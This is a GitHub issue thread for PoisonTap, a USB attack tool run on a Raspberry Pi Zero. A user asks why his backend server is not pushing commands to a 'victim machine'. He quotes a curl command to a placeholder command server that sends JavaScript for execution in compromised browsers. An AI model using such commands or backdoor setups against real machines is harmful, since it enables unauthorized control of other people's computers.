samyk/poisontap #54: Backend Server not pushing commands to victim?

danthegoodman1, 2016-12-02:
So everything is working on the pi zero (I think, I get the same stuff in the network as Samy does). But the problem comes to the server.

First I want to ask: when the pi makes the outbound connection to the server, should the server say anything? All I see is the "listening on port 1337" but nothing when the pi is plugged in.

I am running the backend_server.js in a screen (am I supposed to run it in screen? Or should I just run it in the normal shell?), and I can send commands like the curl 'http://domain.com/1337/exec?alert("message")'. It says sent in the shell, then when I go to the screen it says request received. But there is no evidence of anything being sent to the victim machine. Nothing on console, network, logs, anything. Is there something wrong with my server? (I am using AWS ubuntu server and have 1337 port forwarded). This seems to the be problem, is some connection error between the victim and the server. 

Information that might be useful to help me:
When looking at the console, all of the links that are domain.com/Poisontap get error 404, but I assume this is fine because that page doesn't actually exist. The network is fine, with a 404 here and there. My network graph is similar to the one Samy shows in his video, but I have a lot more gray area.

Any help would be super appreciated, Thanks!!!

samyk, 2016-12-02:
See #29

closed 2016-12-02 by samyk

danthegoodman1, 2016-12-02:
@samyk Thanks so much!